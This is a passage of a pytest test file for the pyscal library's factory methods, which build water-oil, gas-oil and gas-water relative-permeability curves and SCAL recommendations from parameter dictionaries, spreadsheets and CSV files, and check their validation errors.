PyscalFactory.create_water_oil_gas(\n {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2}, fast=True\n )\n assert wateroilgas.fast\n assert wateroilgas.wateroil.fast\n assert wateroilgas.gasoil.fast\n\n scalrec = PyscalFactory.create_scal_recommendation(\n {\n \"low\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n 
\"base\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n \"high\": {\"nw\": 2, \"now\": 2, \"ng\": 2, \"nog\": 2},\n },\n fast=True,\n )\n assert scalrec.low.fast\n assert scalrec.base.fast\n assert scalrec.high.fast\n\n interpolant = scalrec.interpolate(-0.5)\n assert interpolant.fast\n\n\ndef test_init_with_swlheight():\n \"\"\"With sufficient parameters, swl will be calculated on the fly\n when initializing the WaterOil object\"\"\"\n pyscal_factory = PyscalFactory()\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(wateroil.swl, 0.02480395)\n assert \"swl=0.024\" in wateroil.SWOF()\n\n with pytest.raises(\n ValueError,\n match=\"Can't initialize from SWLHEIGHT without sufficient simple-J parameters\",\n ):\n # This should fail because capillary pressure parameters are not provided.\n pyscal_factory.create_water_oil(dict(swlheight=200, nw=1, now=1))\n\n # swcr must be larger than swl:\n with pytest.raises(ValueError, match=\"lower than computed swl\"):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n swcr=0.0101,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n # swlheight must be positive:\n with pytest.raises(ValueError, match=\"swlheight must be larger than zero\"):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=-200,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n # If swcr is large enough, it will pass:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n swirr=0.01,\n swcr=0.3,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert wateroil.swcr > wateroil.swl\n assert wateroil.swcr == 0.3\n assert \"swcr=0.3\" in wateroil.SWOF()\n\n # Test that GasWater also can be initialized with swlheight:\n gaswater = pyscal_factory.create_gas_water(\n dict(\n swlheight=200,\n nw=1,\n ng=1,\n swirr=0.01,\n swcr=0.3,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert \"swl=0.024\" in gaswater.SWFN()\n assert gaswater.swcr > gaswater.swl\n assert gaswater.swcr == 0.3\n assert \"swcr=0.3\" in gaswater.SWFN()\n\n # Test error message for missing swirr when swlheight is asked for:\n with pytest.raises(\n ValueError, match=\"Can't initialize from SWLHEIGHT without sufficient simple-J\"\n ):\n pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n nw=1,\n now=1,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n\n\ndef test_relative_swcr():\n \"\"\"swcr can be initialized relative to swl\n\n Relevant when swl is initialized from swlheight.\"\"\"\n pyscal_factory = PyscalFactory()\n\n with pytest.raises(ValueError, match=\"swl must be provided\"):\n pyscal_factory.create_water_oil(dict(swcr_add=0.1, nw=1, now=1, swirr=0.01))\n with pytest.raises(ValueError, match=\"swcr and swcr_add at the same time\"):\n pyscal_factory.create_water_oil(\n dict(swcr_add=0.1, swcr=0.1, swl=0.1, nw=1, now=1, swirr=0.01)\n )\n wateroil = pyscal_factory.create_water_oil(\n dict(swcr_add=0.1, swl=0.1, nw=1, now=1, swirr=0.01)\n )\n assert wateroil.swcr == 0.2\n\n # Test when relative to swlheight:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swlheight=200,\n swcr_add=0.01,\n nw=1,\n now=1,\n swirr=0.01,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(wateroil.swl, 0.02480395)\n assert 
np.isclose(wateroil.swcr, 0.02480395 + 0.01)\n\n gaswater = pyscal_factory.create_gas_water(\n dict(\n swlheight=200,\n nw=1,\n ng=1,\n swirr=0.01,\n swcr_add=0.1,\n a=1,\n b=-2,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert np.isclose(gaswater.swl, 0.02480395)\n assert np.isclose(gaswater.swcr, 0.02480395 + 0.1)\n\n\ndef test_ambiguity():\n \"\"\"Test how the factory handles ambiguity between Corey and LET\n parameters\"\"\"\n pyscal_factory = PyscalFactory()\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=10, Lw=1, Ew=1, Tw=1, now=2, h=0.1, no=2)\n )\n # Corey is picked here.\n assert \"Corey\" in wateroil.krwcomment\n assert \"KRW\" in wateroil.table\n\n\ndef test_factory_gasoil():\n \"\"\"Test that we can create curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_gas_oil()\n\n with pytest.raises(TypeError):\n # (this must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_oil(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_gas_oil(params=\"swirr 0.01\")\n\n gasoil = pyscal_factory.create_gas_oil(\n dict(swirr=0.01, swl=0.1, sgcr=0.05, tag=\"Good sand\", ng=1, nog=2)\n )\n assert isinstance(gasoil, GasOil)\n assert gasoil.sgcr == 0.05\n assert gasoil.sgro == 0.0\n assert gasoil.swl == 0.1\n assert gasoil.swirr == 0.01\n assert gasoil.tag == \"Good sand\"\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Zero capillary pressure\" in sgof\n\n gasoil = pyscal_factory.create_gas_oil(\n dict(ng=1.2, nog=2, krgend=0.8, krgmax=0.9, kroend=0.6)\n )\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n assert \"kroend=0.6\" in sgof\n assert \"krgend=0.8\" in sgof\n check_table(gasoil.table)\n\n gasoil = pyscal_factory.create_gas_oil(dict(ng=1.3, Log=2, Eog=2, Tog=2))\n sgof = gasoil.SGOF()\n check_table(gasoil.table)\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"LET krog\" in sgof\n\n gasoil = pyscal_factory.create_gas_oil(dict(Lg=1, Eg=1, Tg=1, Log=2, Eog=2, Tog=2))\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"LET krg\" in sgof\n assert \"LET krog\" in sgof\n\n\ndef test_factory_wog_gascondensate():\n \"\"\"Test modelling of gas condensate, which in pyscal terms\n is the same as wateroilgas, except that we allow for aliasing\n in sgrw=sorw for the underlying WaterOil object, and also there\n are additional parameters sgro and kromax for GasOil.\"\"\"\n wcg = PyscalFactory.create_water_oil_gas(\n dict(\n nw=2,\n now=3,\n ng=1,\n nog=2,\n sgrw=0.1,\n swl=0.1,\n sgcr=0.1,\n sgro=0.1,\n kroend=0.5,\n kromax=0.9,\n )\n )\n assert wcg.gasoil.sgro == 0.1\n assert wcg.wateroil.sorw == 0.1\n\n swof = wcg.SWOF()\n sgof = wcg.SGOF()\n\n # sgrw has been aliased to sorw, but the WaterOil object does not know that:\n assert \"sgrw\" not in swof\n assert \"sorw=0.1\" in swof\n assert \"sgro=0.1\" in sgof\n assert \"kroend=0.5\" in sgof\n assert \"kromax=0.9\" in sgof\n\n sat_table_str_ok(swof)\n sat_table_str_ok(sgof)\n\n # Different sorw and sgrw is a hard error:\n with pytest.raises(ValueError, match=\"must equal\"):\n PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2, sorw=0.2, sgrw=0.1, swl=0.1)\n )\n\n # But it will pass if they both are supplied but are equal:\n wcg_2 = 
PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2, sorw=0.2, sgrw=0.2, swl=0.1)\n )\n assert \"sorw=0.2\" in wcg_2.SWOF()\n\n # kroend higher than kromax is an error:\n with pytest.raises(AssertionError):\n PyscalFactory.create_water_oil_gas(\n dict(\n nw=2,\n now=3,\n ng=1,\n nog=2,\n sgcr=0.1,\n sgro=0.1,\n kromax=0.5,\n kroend=0.8,\n swl=0.1,\n )\n )\n\n\ndef test_factory_go_gascondensate():\n \"\"\"In gas condensate problems, the sgro and kromax parameters are relevant\"\"\"\n pyscal_factory = PyscalFactory()\n gasoil = pyscal_factory.create_gas_oil(\n dict(sgro=0.1, sgcr=0.1, tag=\"Good sand\", ng=1, nog=2, kroend=0.5, kromax=0.9)\n )\n assert isinstance(gasoil, GasOil)\n assert gasoil.sgro == 0.1\n assert gasoil.tag == \"Good sand\"\n sgof = gasoil.SGOF()\n sat_table_str_ok(sgof)\n check_table(gasoil.table)\n assert \"Corey krog\" in sgof\n assert \"kroend=0.5\" in sgof\n assert \"kromax=0.9\" in sgof\n assert \"sgro=0.1\" in sgof\n\n\ndef test_factory_gaswater():\n \"\"\"Test that we can create gas-water curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_gas_water()\n\n with pytest.raises(TypeError):\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_water(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n # (it must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_gas_water(params=\"swirr 0.01\")\n\n gaswater = pyscal_factory.create_gas_water(\n dict(swirr=0.01, swl=0.03, sgrw=0.1, sgcr=0.15, tag=\"gassy sand\", ng=2, nw=2)\n )\n\n assert isinstance(gaswater, GasWater)\n\n assert gaswater.swirr == 0.01\n assert gaswater.swl == 0.03\n assert gaswater.sgrw == 0.1\n assert gaswater.sgcr == 0.15\n assert gaswater.tag == \"gassy sand\"\n\n sgfn = gaswater.SGFN()\n swfn = gaswater.SWFN()\n sat_table_str_ok(sgfn)\n sat_table_str_ok(swfn)\n check_table(gaswater.wateroil.table)\n check_table(gaswater.gasoil.table)\n\n assert \"sgrw=0.1\" in swfn\n assert \"swirr=0.01\" in sgfn\n assert \"swirr=0.01\" in swfn\n assert \"sgrw=0.1\" in swfn\n assert \"sgcr=0.15\" in sgfn\n assert \"nw=2\" in swfn\n assert \"ng=2\" in sgfn\n assert \"gassy sand\" in sgfn\n\n gaswater = pyscal_factory.create_gas_water(dict(lg=1, eg=1, tg=1, nw=3))\n\n sgfn = gaswater.SGFN()\n swfn = gaswater.SWFN()\n sat_table_str_ok(sgfn)\n sat_table_str_ok(swfn)\n check_table(gaswater.wateroil.table)\n check_table(gaswater.gasoil.table)\n\n\ndef test_factory_wateroilgas():\n \"\"\"Test creating discrete cases of WaterOilGas from factory\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_water_oil_gas()\n\n with pytest.raises(TypeError):\n # (this must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_water_oil_gas(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_water_oil_gas(params=\"swirr 0.01\")\n\n wog = pyscal_factory.create_water_oil_gas(dict(nw=2, now=3, ng=1, nog=2.5))\n swof = wog.SWOF()\n sgof = wog.SGOF()\n sat_table_str_ok(swof) # sgof code works for swof also currently\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Corey krw\" in swof\n assert \"Corey krow\" in swof\n check_table(wog.gasoil.table)\n check_table(wog.wateroil.table)\n\n # Some users will mess up lower vs 
upper case:\n wog = pyscal_factory.create_water_oil_gas(dict(NW=2, NOW=3, NG=1, nog=2.5))\n swof = wog.SWOF()\n sgof = wog.SGOF()\n sat_table_str_ok(swof) # sgof code works for swof also currently\n sat_table_str_ok(sgof)\n assert \"Corey krg\" in sgof\n assert \"Corey krog\" in sgof\n assert \"Corey krw\" in swof\n assert \"Corey krow\" in swof\n\n # Mangling data\n wateroil = pyscal_factory.create_water_oil_gas(dict(nw=2, now=3, ng=1))\n assert wateroil.gasoil is None\n\n\ndef test_factory_wateroilgas_deprecated_krowgend():\n \"\"\"Using long-time deprecated krowend and krogend will fail\"\"\"\n with pytest.raises(ValueError):\n PyscalFactory.create_water_oil_gas(\n dict(nw=2, now=3, ng=1, nog=2.5, krowend=0.6, krogend=0.7)\n )\n\n\ndef test_factory_wateroilgas_wo():\n \"\"\"Test making only wateroil through the wateroilgas factory\"\"\"\n pyscal_factory = PyscalFactory()\n wog = pyscal_factory.create_water_oil_gas(\n dict(nw=2, now=3, kroend=0.5, sorw=0.04, swcr=0.1)\n )\n swof = wog.SWOF()\n assert \"Corey krw\" in swof\n assert \"KRW\" in wog.wateroil.table\n sat_table_str_ok(swof)\n check_table(wog.wateroil.table)\n assert wog.gasoil is None\n\n wog.SGOF()\n\n\ndef test_factory_wateroil_paleooil(caplog):\n \"\"\"Test making a WaterOil object with socr different from sorw.\"\"\"\n pyscal_factory = PyscalFactory()\n sorw = 0.09\n wateroil = pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=sorw, socr=sorw + 0.01, swcr=0.1)\n )\n swof = wateroil.SWOF()\n assert \"Corey krw\" in swof\n assert \"socr=0.1\" in swof\n sat_table_str_ok(swof)\n check_table(wateroil.table)\n\n # If socr is close to sorw, socr is reset to sorw.\n for socr in [sorw - 1e-9, sorw, sorw + 1e-9]:\n wo_socrignored = pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=0.09, socr=socr, swcr=0.1)\n )\n swof = wo_socrignored.SWOF()\n assert \"socr\" not in swof # socr is effectively ignored when = sorw.\n sat_table_str_ok(swof)\n if socr != sorw:\n # This warning should only occur when it seems like the user\n # has tried to explicitly set socr\n assert \"socr was close to sorw, reset to sorw\" in caplog.text\n\n with pytest.raises(ValueError, match=\"socr must be equal to or larger than sorw\"):\n pyscal_factory.create_water_oil(\n dict(nw=2, now=3, kroend=0.5, sorw=0.09, socr=0.001, swcr=0.1, h=0.1)\n )\n\n\ndef test_load_relperm_df(tmp_path, caplog):\n \"\"\"Test loading of dataframes with validation from excel or from csv\"\"\"\n testdir = Path(__file__).absolute().parent\n\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n with pytest.raises(IOError):\n PyscalFactory.load_relperm_df(\"not-existing-file\")\n\n with pytest.raises(ValueError, match=\"Non-existing sheet-name\"):\n PyscalFactory.load_relperm_df(scalfile_xls, sheet_name=\"foo\")\n\n assert \"SATNUM\" in scaldata\n assert \"CASE\" in scaldata\n assert not scaldata.empty\n\n os.chdir(tmp_path)\n scaldata.to_csv(\"scal-input.csv\")\n scaldata_fromcsv = PyscalFactory.load_relperm_df(\"scal-input.csv\")\n assert \"CASE\" in scaldata_fromcsv\n assert not scaldata_fromcsv.empty\n scaldata_fromdf = PyscalFactory.load_relperm_df(scaldata_fromcsv)\n assert \"CASE\" in scaldata_fromdf\n assert \"SATNUM\" in scaldata_fromdf\n assert len(scaldata_fromdf) == len(scaldata_fromcsv) == len(scaldata)\n\n scaldata_fromcsv = PyscalFactory.load_relperm_df(\"scal-input.csv\", sheet_name=\"foo\")\n assert \"Sheet name only relevant for XLSX files, ignoring foo\" in 
caplog.text\n\n with pytest.raises(ValueError, match=\"Unsupported argument\"):\n PyscalFactory.load_relperm_df(dict(foo=1))\n\n # Perturb the dataframe, this should trigger errors\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(scaldata.drop(\"SATNUM\", axis=\"columns\"))\n wrongsatnums = scaldata.copy()\n wrongsatnums[\"SATNUM\"] = wrongsatnums[\"SATNUM\"] * 2\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongsatnums)\n wrongsatnums = scaldata.copy()\n wrongsatnums[\"SATNUM\"] = wrongsatnums[\"SATNUM\"].astype(int)\n wrongsatnums = wrongsatnums[wrongsatnums[\"SATNUM\"] > 2]\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongsatnums)\n wrongcases = scaldata.copy()\n wrongcases[\"CASE\"] = wrongcases[\"CASE\"] + \"ffooo\"\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(wrongcases)\n\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(scaldata.drop([\"Lw\", \"Lg\"], axis=\"columns\"))\n\n # Insert a NaN, this replicates what happens if cells are merged\n mergedcase = scaldata.copy()\n mergedcase.loc[3, \"SATNUM\"] = np.nan\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(mergedcase)\n\n relpermfile_xls = testdir / \"data/relperm-input-example.xlsx\"\n relpermdata = PyscalFactory.load_relperm_df(relpermfile_xls)\n assert \"TAG\" in relpermdata\n assert \"SATNUM\" in relpermdata\n assert \"satnum\" not in relpermdata # always converted to upper-case\n assert len(relpermdata) == 3\n swof_str = PyscalFactory.create_pyscal_list(relpermdata, h=0.2).SWOF()\n assert \"Åre 1.8\" in swof_str\n assert \"SATNUM 2\" in swof_str # Autogenerated in SWOF, generated by factory\n assert \"SATNUM 3\" in swof_str\n assert \"foobar\" in swof_str # Random string injected in xlsx.\n\n # Make a dummy text file\n Path(\"dummy.txt\").write_text(\"foo\\nbar, com\", encoding=\"utf8\")\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(\"dummy.txt\")\n\n # Make an empty csv file\n Path(\"empty.csv\").write_text(\"\", encoding=\"utf8\")\n with pytest.raises(ValueError, match=\"Impossible to infer file format\"):\n PyscalFactory.load_relperm_df(\"empty.csv\")\n\n with pytest.raises(ValueError, match=\"SATNUM must be present\"):\n PyscalFactory.load_relperm_df(pd.DataFrame())\n\n # Merge tags and comments if both are supplied\n Path(\"tagandcomment.csv\").write_text(\n \"SATNUM,nw,now,tag,comment\\n1,1,1,a-tag,a-comment\", encoding=\"utf8\"\n )\n tagandcomment_df = PyscalFactory.load_relperm_df(\"tagandcomment.csv\")\n assert (\n tagandcomment_df[\"TAG\"].values[0] == \"SATNUM 1 tag: a-tag; comment: a-comment\"\n )\n\n # Missing SATNUMs:\n Path(\"wrongsatnum.csv\").write_text(\"SATNUM,nw,now\\n1,1,1\\n3,1,1\", encoding=\"utf8\")\n with pytest.raises(ValueError, match=\"Missing SATNUMs?\"):\n PyscalFactory.load_relperm_df(\"wrongsatnum.csv\")\n\n # Missing SATNUMs, like merged cells:\n Path(\"mergedcells.csv\").write_text(\n \"CASE,SATNUM,nw,now\\nlow,,1,1\\nlow,1,2,2\\nlow,,3,32\", encoding=\"utf8\"\n )\n with pytest.raises(ValueError, match=\"Found not-a-number\"):\n PyscalFactory.load_relperm_df(\"mergedcells.csv\")\n\n # Missing SATNUMs, like merged cells:\n Path(\"mergedcellscase.csv\").write_text(\n \"CASE,SATNUM,nw,now\\n,1,1,1\\nlow,1,2,2\\n,1,3,32\", encoding=\"utf8\"\n )\n with pytest.raises(ValueError, match=\"Found not-a-number\"):\n PyscalFactory.load_relperm_df(\"mergedcellscase.csv\")\n\n # Not valid CSV file\n Path(\"notvalidcsv.csv\").write_text(\"SATNUM;nw;now\\n1;1;1\", 
encoding=\"utf-8\")\n with pytest.raises(TypeError, match=\"Supplied file is not a valid CSV file\"):\n PyscalFactory.load_relperm_df(\"notvalidcsv.csv\")\n\n\ndef test_many_nans():\n \"\"\"Excel or oocalc sometimes saves a xlsx file that gives all NaN rows and\n all-NaN columns, maybe some column setting that triggers Pandas to load\n them as actual columns/rows.\n\n Ensure we handle extra Nans in both directions\"\"\"\n nanframe = pd.DataFrame(\n [\n {\"SATNUM\": 1, \"nw\": 2, \"now\": 2, \"Unnamed: 15\": np.nan},\n {\"SATNUM\": np.nan, \"nw\": np.nan, \"now\": np.nan, \"Unnamed: 15\": np.nan},\n ]\n )\n wateroil_list = PyscalFactory.create_pyscal_list(\n PyscalFactory.load_relperm_df(nanframe)\n )\n assert len(wateroil_list) == 1\n sat_table_str_ok(wateroil_list.SWOF())\n\n\ndef test_xls_factory():\n \"\"\"Test/demonstrate how to go from data in an excel row to pyscal objects\n\n This test function predates the load_relperm_df() function, but can\n still be in here.\n \"\"\"\n testdir = Path(__file__).absolute().parent\n\n xlsxfile = testdir / \"data/scal-pc-input-example.xlsx\"\n\n scalinput = pd.read_excel(xlsxfile, engine=\"openpyxl\").set_index([\"SATNUM\", \"CASE\"])\n\n for (satnum, _), params in scalinput.iterrows():\n assert satnum\n wog = PyscalFactory.create_water_oil_gas(params.to_dict())\n swof = wog.SWOF()\n assert \"LET krw\" in swof\n assert \"LET krow\" in swof\n assert \"Simplified J\" in swof\n sgof = wog.SGOF()\n sat_table_str_ok(sgof)\n assert \"LET krg\" in sgof\n assert \"LET krog\" in sgof\n\n\ndef test_create_scal_recommendation_list():\n \"\"\"Test the factory methods for making scalrecommendation lists\"\"\"\n testdir = Path(__file__).absolute().parent\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n\n scalrec_list = PyscalFactory.create_scal_recommendation_list(scaldata)\n assert len(scalrec_list) == 3\n assert scalrec_list.pyscaltype == SCALrecommendation\n\n # Erroneous input:\n with pytest.raises(ValueError, match=\"Too many cases supplied for SATNUM 2\"):\n PyscalFactory.create_scal_recommendation_list(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"NW\", \"NOW\"],\n data=[\n [1, \"low\", 1, 1],\n [1, \"base\", 2, 2],\n [1, \"high\", 3, 3],\n [2, \"low\", 1, 1],\n [2, \"nearlylow\", 1.4, 1.2],\n [2, \"base\", 2, 2],\n [2, \"high\", 3, 3],\n ],\n )\n )\n with pytest.raises(ValueError, match=\"Too few cases supplied for SATNUM 2\"):\n PyscalFactory.create_scal_recommendation_list(\n pd.DataFrame(\n columns=[\"SATNUM\", \"CASE\", \"NW\", \"NOW\"],\n data=[\n [1, \"low\", 1, 1],\n [1, \"base\", 2, 2],\n [1, \"high\", 3, 3],\n [2, \"low\", 1, 1],\n [2, \"high\", 3, 3],\n ],\n )\n )\n\n\ndef test_create_pyscal_list():\n \"\"\"Test the factory methods for making pyscal lists\"\"\"\n testdir = Path(__file__).absolute().parent\n scalfile_xls = testdir / \"data/scal-pc-input-example.xlsx\"\n scaldata = PyscalFactory.load_relperm_df(scalfile_xls)\n basecasedata = scaldata[scaldata[\"CASE\"] == \"base\"].reset_index()\n relpermlist = PyscalFactory.create_pyscal_list(basecasedata)\n assert len(relpermlist) == 3\n assert relpermlist.pyscaltype == WaterOilGas\n\n wo_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Lg\", \"Eg\", \"Tg\", \"Log\", \"Eog\", \"Tog\"], axis=\"columns\")\n )\n\n assert len(wo_list) == 3\n assert wo_list.pyscaltype == WaterOil\n\n go_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Lw\", \"Ew\", \"Tw\", \"Low\", \"Eow\", \"Tow\"], 
axis=\"columns\")\n )\n\n assert len(go_list) == 3\n assert go_list.pyscaltype == GasOil\n\n gw_list = PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Low\", \"Eow\", \"Tow\", \"Log\", \"Eog\", \"Tog\"], axis=\"columns\")\n )\n\n assert len(gw_list) == 3\n assert gw_list.pyscaltype == GasWater\n\n with pytest.raises(\n ValueError, match=\"Could not determine two or three phase from parameters\"\n ):\n PyscalFactory.create_pyscal_list(\n basecasedata.drop([\"Ew\", \"Eg\"], axis=\"columns\")\n )\n\n\ndef test_scalrecommendation():\n \"\"\"Testing making SCAL rec from dict of dict.\"\"\"\n pyscal_factory = PyscalFactory()\n\n scal_input = {\n \"low\": {\"nw\": 2, \"now\": 4, \"ng\": 1, \"nog\": 2},\n \"BASE\": {\"nw\": 3, \"NOW\": 3, \"ng\": 1, \"nog\": 2},\n \"high\": {\"nw\": 4, \"now\": 2, \"ng\": 1, \"nog\": 3},\n }\n scal = pyscal_factory.create_scal_recommendation(scal_input)\n\n with pytest.raises(ValueError, match=\"Input must be a dict\"):\n pyscal_factory.create_scal_recommendation(\"low\")\n\n # (not supported yet to make WaterOil only..)\n interp = scal.interpolate(-0.5)\n sat_table_str_ok(interp.SWOF())\n sat_table_str_ok(interp.SGOF())\n sat_table_str_ok(interp.SLGOF())\n sat_table_str_ok(interp.SOF3())\n check_table(interp.wateroil.table)\n check_table(interp.gasoil.table)\n\n # Check that we error if any of the parameters above is missing:\n for case in [\"low\", \"BASE\", \"high\"]:\n copy1 = scal_input.copy()\n del copy1[case]\n with pytest.raises(ValueError):\n pyscal_factory.create_scal_recommendation(copy1)\n\n go_only = scal_input.copy()\n del go_only[\"low\"][\"now\"]\n del go_only[\"low\"][\"nw\"]\n gasoil = pyscal_factory.create_scal_recommendation(go_only)\n assert gasoil.low.wateroil is None\n assert gasoil.base.wateroil is not None\n assert gasoil.high.wateroil is not None\n # SCALrecommendation of gasoil only works as long as you\n # don't try to ask for water data:\n assert \"SGFN\" in gasoil.interpolate(-0.4).SGFN()\n assert \"SWOF\" not in gasoil.interpolate(-0.2).SWOF()\n\n basehigh = scal_input.copy()\n del basehigh[\"low\"]\n with pytest.raises(ValueError, match='\"low\" case not supplied'):\n pyscal_factory.create_scal_recommendation(basehigh)\n\n baselow = scal_input.copy()\n del baselow[\"high\"]\n with pytest.raises(ValueError, match='\"high\" case not supplied'):\n pyscal_factory.create_scal_recommendation(baselow)\n\n with pytest.raises(\n ValueError, match=\"All values in parameter dict must be dictionaries\"\n ):\n pyscal_factory.create_scal_recommendation(\n {\"low\": [1, 2], \"base\": {\"swl\": 0.1}, \"high\": {\"swl\": 0.1}}\n )\n\n\ndef test_scalrecommendation_gaswater():\n \"\"\"Testing making SCAL rec from dict of dict for gaswater input\"\"\"\n pyscal_factory = PyscalFactory()\n\n scal_input = {\n \"low\": {\"nw\": 2, \"ng\": 1},\n \"BASE\": {\"nw\": 3, \"ng\": 1},\n \"high\": {\"nw\": 4, \"ng\": 1},\n }\n scal = pyscal_factory.create_scal_recommendation(scal_input, h=0.2)\n interp = scal.interpolate(-0.5, h=0.2)\n sat_table_str_ok(interp.SWFN())\n sat_table_str_ok(interp.SGFN())\n check_table(interp.wateroil.table)\n check_table(interp.gasoil.table)\n\n\ndef test_xls_scalrecommendation():\n \"\"\"Test making SCAL recommendations from xls data\"\"\"\n testdir = Path(__file__).absolute().parent\n\n xlsxfile = testdir / \"data/scal-pc-input-example.xlsx\"\n scalinput = pd.read_excel(xlsxfile, engine=\"openpyxl\").set_index([\"SATNUM\", \"CASE\"])\n for satnum in scalinput.index.levels[0].values:\n dictofdict = scalinput.loc[satnum, 
:].to_dict(orient=\"index\")\n scalrec = PyscalFactory.create_scal_recommendation(dictofdict)\n scalrec.interpolate(+0.5)\n\n\ndef test_no_gasoil():\n \"\"\"The command client does not support two-phase gas-oil, because\n that is most likely a sign of a user input error\n (misspelled other columns, for example).\n\n Make sure we fail in that case.\"\"\"\n dframe = pd.DataFrame(columns=[\"SATNUM\", \"NOW\", \"NG\"], data=[[1, 2, 2]])\n with pytest.raises(ValueError):\n PyscalFactory.load_relperm_df(dframe)\n\n\ndef test_check_deprecated_krowgend():\n \"\"\"Up until pyscal 0.5.x, krogend and krowend were parameters\n to the oil curve parametrization for WaterOil and GasOil. From\n pyscal 0.6.0, krogend and krowend are merged to kroend.\n After pyscal 0.8, the presence of krogend or krowend is a ValueError\n \"\"\"\n with pytest.raises(ValueError):\n PyscalFactory.create_water_oil(dict(swl=0.1, nw=2, now=2, krowend=0.4))\n\n with pytest.raises(ValueError):\n PyscalFactory.create_gas_oil(dict(swl=0.1, ng=2, nog=2, krogend=0.4))\n\n # If krogend and kroend are both present, krogend is to be silently ignored\n # (random columns are in general accepted and ignored by pyscal)\n\n gasoil = PyscalFactory.create_gas_oil(\n dict(swl=0.1, ng=2, nog=2, krogend=0.4, kroend=0.3)\n )\n assert gasoil.table[\"KROG\"].max() == 0.3\n\n wateroil = PyscalFactory.create_water_oil(\n dict(swl=0.1, nw=2, now=2, krowend=0.4, kroend=0.3)\n )\n assert wateroil.table[\"KROW\"].max() == 0.3\n\n\ndef parse_gensatfuncline(conf_line):\n \"\"\"Utility function that emulates how gensatfunc could parse\n its configuration lines in a pyscalfactory compatible fashion\n\n Args:\n conf_line (str): gensatfunc config line\n Returns:\n dict\n \"\"\"\n\n # This is how the config line should be interpreted in terms of\n # pyscal parameters. 
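Extra keys are accepted and ignored by the factory. 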
